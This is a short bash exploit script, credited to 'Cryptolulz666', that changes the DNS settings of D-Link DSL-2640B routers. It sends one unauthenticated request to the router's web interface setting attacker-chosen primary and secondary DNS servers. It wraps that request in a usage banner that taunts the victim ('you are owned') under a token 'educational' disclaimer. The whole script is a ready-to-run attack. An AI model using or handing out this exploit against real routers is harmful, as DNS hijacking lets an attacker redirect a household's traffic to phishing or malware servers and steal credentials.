#!/bin/bash # # D-Link DSL-2640B Remote DNS Change Exploit # Description: # Different D-Link Routers are vulnerable to DNS change. # The vulnerability exist in the web interface, which is # accessible without authentication. # # Tested On Linux/ubuntu/Debian/All Other Linux # Compatible Core i86 # Script Bash By Cryptolulz666 # Use This For Educational Purphose if [[ $# -gt 3 || $# -lt 2 ]]; then echo " D-Link DSL-2640B Remote DNS Change Exploit" echo " ================================================================" echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>" echo " Example: $0 192.168.1.1 8.8.8.8" echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" echo "" echo " Copyright none public " echo " security sucks ass " echo " this server is vuln and you are owned " exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then echo " Error : libwww-perl not found =/" exit; fi GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1